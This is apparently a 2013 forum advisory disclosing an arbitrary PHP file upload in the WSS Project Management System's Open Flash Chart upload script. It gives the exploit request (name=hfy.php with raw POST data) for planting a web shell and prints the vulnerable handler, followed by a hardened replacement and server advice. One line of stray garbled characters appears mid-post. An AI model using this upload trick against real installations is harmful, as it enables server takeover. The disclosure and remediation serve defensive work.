WSS Project Management System: POST to get shell

Posted on 2013-2-23 12:38:58
POST data: the vulnerable file saves a file with any extension you choose.
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name)

POST arbitrary data
Saved at: http://localhost/chart/tmp-upload-images/hfy.php

The latest WSS version still ships this vulnerable file; even the paid version has it, as does the demo deployed on the Sina app store.
- g4 I! ~. g9 M' N# `
<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>
Fix:
This vulnerable file is a tragedy. How to fix it? Add permission checks, extension validation and the like; do it yourself.
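A hardened replacement for the handler above, as an added example that is not the post author's or the WSS project's code. It assumes PHP 7 or later, a login flag `$_SESSION['user_id']` set by the application (hypothetical name), and the same tmp-upload-images/ directory; it keeps the raw-POST-body input the chart exporter uses but drops the client-chosen filename, checks the body really is a PNG, and writes the file non-executable.

```php
<?php
// Added example: hardened upload handler. Assumes the application's login sets
// $_SESSION['user_id'] (hypothetical name); the original had no access check at all.
session_start();
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('login required');
}

$upload_dir = __DIR__ . '/../tmp-upload-images/';
if (!is_dir($upload_dir)) mkdir($upload_dir, 0755, true);

// Read the raw body (what the chart exporter sends) and require it to be a PNG:
// check the 8-byte PNG signature and that GD can parse it, rather than trusting a name.
$data = file_get_contents('php://input');
if (strlen($data) < 8 || substr($data, 0, 8) !== "\x89PNG\r\n\x1a\n") {
    http_response_code(400);
    exit('PNG data expected');
}
if (function_exists('imagecreatefromstring') && @imagecreatefromstring($data) === false) {
    http_response_code(400);
    exit('invalid image');
}

// Never reuse $_GET['name']: generate the filename server-side with a fixed
// extension, so the request cannot choose ".php" or smuggle path components.
$filename = bin2hex(random_bytes(16)) . '.png';
$destination = $upload_dir . $filename;

// 'x' mode refuses to overwrite an existing file; 0644 keeps it non-executable.
$fh = fopen($destination, 'x');
if ($fh === false) {
    http_response_code(500);
    exit('could not create file');
}
fwrite($fh, $data);
fclose($fh);
chmod($destination, 0644);

echo 'Saving your image to: ' . basename($destination);
```

As defence in depth, also configure the web server so that nothing under tmp-upload-images/ is ever handed to the PHP interpreter, so a bypass of the checks above still cannot yield code execution.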